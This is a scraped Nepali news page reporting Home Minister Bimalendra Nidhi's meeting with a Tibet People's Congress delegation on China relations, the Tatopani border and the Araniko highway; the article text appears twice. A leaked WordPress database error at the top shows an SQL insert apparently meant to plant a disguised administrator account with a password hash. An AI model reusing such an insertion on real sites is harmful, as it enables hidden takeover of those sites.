WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDAYYK4qVj3gUCihGQ.3V1RD0R9JxU/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:19:53', '', 'admlnlx', 'admlnlx')
काठमाडौँ,पुस ७ –
उपप्रधान एवम् गृहमन्त्री विमलेन्द्र निधि र नेपाल भ्रमणमा रहेको चीनको स्वशासित क्षेत्र तिब्बत पिपुल्स कंग्रेस ९संसद० का अध्यक्ष बाई मा चिलिन नेतृत्वको प्रतिनिधिमण्डलबीच आज बिहान भेटवार्ता भएको छ ।
गृहमन्त्रालयमा भएको भेटमा निकट भविष्यमा हुन लागेको चिनियाँ राष्ट्रपतिको नेपाल भ्रमण, दुई देशबीचको ऐतिहासिक र सांकृतिक सम्बन्धलगायतका विषयमा कुराकानी भएको थियो । त्यस अवसरमा गृहमन्त्री निधिले चीनसँगको सम्बन्धलाई नेपाल सरकारले अत्यन्त महत्व दिएको उल्लेख गर्दै नेपाल एक चीन नीतिप्रति प्रतिबद्ध रहेको बताउनुभयो । उहाँले नेपाली भूमिबाट चीन विरोधी गतिविधि हुन नदिने प्रतिबद्धता पनि जनाउनुभयो ।
चीनले हासिल गरेको आर्थिक समृद्धि र त्यसबाट सिर्जित अवसरको सदुपयोग गर्ने नेपालको चाहना रहेको मन्त्री निधिले उल्लेख गर्नुभयो ।
गत वर्षको भूकम्पपछि बन्द रहेको तातोपानी नाका खुलाउनेतर्फ पहल गर्न मन्त्री निधिले तिब्बत पिपुल्स कंग्रेस ९संसद० का अध्यक्ष बाइको ध्यानाकर्षण गराउनुभयो ।
त्यस अवसरमा अध्यक्ष बाइले अरनिको राजमार्ग पुनःनिर्माणलाई चीन सरकारले उच्च प्राथमिकता दिने प्रतिबद्धता जनाउनुभयो ।
साथै, उहाँले असल छिमेकीका नाताले नेपालको विकास निर्माणमा चीन सरकारले सदैव सहयोग गर्ने बताउनुभयो । रासस काठमाडौँ, ७ पुस । उपप्रधान एवम् गृहमन्त्री विमलेन्द्र निधि र नेपाल भ्रमणमा रहेको चीनको स्वशासित क्षेत्र तिब्बत पिपुल्स कंग्रेस ९संसद० का अध्यक्ष बाई मा चिलिन नेतृत्वको प्रतिनिधिमण्डलबीच आज बिहान भेटवार्ता भएको छ ।
गृहमन्त्रालयमा भएको भेटमा निकट भविष्यमा हुन लागेको चिनियाँ राष्ट्रपतिको नेपाल भ्रमण, दुई देशबीचको ऐतिहासिक र सांकृतिक सम्बन्धलगायतका विषयमा कुराकानी भएको थियो । त्यस अवसरमा गृहमन्त्री निधिले चीनसँगको सम्बन्धलाई नेपाल सरकारले अत्यन्त महत्व दिएको उल्लेख गर्दै नेपाल एक चीन नीतिप्रति प्रतिबद्ध रहेको बताउनुभयो । उहाँले नेपाली भूमिबाट चीन विरोधी गतिविधि हुन नदिने प्रतिबद्धता पनि जनाउनुभयो ।
चीनले हासिल गरेको आर्थिक समृद्धि र त्यसबाट सिर्जित अवसरको सदुपयोग गर्ने नेपालको चाहना रहेको मन्त्री निधिले उल्लेख गर्नुभयो ।
गत वर्षको भूकम्पपछि बन्द रहेको तातोपानी नाका खुलाउनेतर्फ पहल गर्न मन्त्री निधिले तिब्बत पिपुल्स कंग्रेस ९संसद० का अध्यक्ष बाइको ध्यानाकर्षण गराउनुभयो ।
त्यस अवसरमा अध्यक्ष बाइले अरनिको राजमार्ग पुनःनिर्माणलाई चीन सरकारले उच्च प्राथमिकता दिने प्रतिबद्धता जनाउनुभयो ।
साथै, उहाँले असल छिमेकीका नाताले नेपालको विकास निर्माणमा चीन सरकारले सदैव सहयोग गर्ने बताउनुभयो । – रासस